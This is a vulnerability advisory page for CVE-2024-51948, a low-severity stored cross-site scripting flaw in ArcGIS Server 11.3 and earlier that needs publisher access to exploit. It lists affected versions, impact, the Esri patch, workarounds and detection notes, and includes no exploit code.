Login Sign Up

CVE-2024-51948

4.8 MEDIUM
Cross-Site Scripting

📋 TL;DR

A stored cross-site scripting vulnerability in ArcGIS Server versions 11.3 and below allows authenticated attackers with publisher privileges to inject malicious JavaScript links. When victims click these links, arbitrary code executes in their browsers. This affects organizations using vulnerable ArcGIS Server deployments.

💻 Affected Systems

Products:
  • ArcGIS Server
Versions: 11.3 and below
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Requires publisher-level authentication; not exploitable by anonymous users.

📦 What is this software?

Arcgis Server by Esri

View all CVEs affecting Arcgis Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated malicious publisher could steal session cookies, perform actions as authenticated users, or redirect to phishing sites by exploiting stored XSS payloads.

🟠

Likely Case

Limited impact due to high privilege requirements; most likely used for session hijacking or credential theft against users who click crafted links.

🟢

If Mitigated

With proper access controls and input validation, impact is minimal as only trusted publishers can exploit and victims must click malicious links.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated publisher access and user interaction (clicking malicious link).

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply ArcGIS Server Security 2025 Update 1 Patch

Vendor Advisory: https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-1-patch/

Restart Required: Yes

Instructions:

1. Download the Security 2025 Update 1 patch from Esri's website.
2. Stop ArcGIS Server services.
3. Apply the patch according to Esri's installation instructions.
4. Restart ArcGIS Server services.
5. Verify successful patch installation.

🔧 Temporary Workarounds

Restrict Publisher Access

all

Limit publisher privileges to trusted users only and implement strict access controls.

Input Validation Enhancement

all

Implement additional server-side validation for user-generated content and links.

🧯 If You Can't Patch

  • Implement strict Content Security Policy (CSP) headers to mitigate XSS impact.
  • Monitor and audit publisher account activities for suspicious link creation.

🔍 How to Verify

Check if Vulnerable:

Check ArcGIS Server version; if 11.3 or below and not patched with Security 2025 Update 1, system is vulnerable.

Check Version:

Check ArcGIS Server version through web interface or server logs.

Verify Fix Applied:

Verify patch installation via ArcGIS Server Administrator Directory or version check commands.

📡 Detection & Monitoring

Log Indicators:

  • Unusual publisher account activity
  • Suspicious link creation patterns in server logs

Network Indicators:

  • Unexpected JavaScript execution in ArcGIS Server responses

SIEM Query:

Search for ArcGIS Server logs containing malicious script patterns or unusual publisher actions.

📊 Metadata

CVE ID: CVE-2024-51948
CVSS v3 Score: 4.8 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
EPSS Score: 0.06% exploit probability (17.5th percentile)
Published: March 3, 2025
Last Updated: April 10, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-51948, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)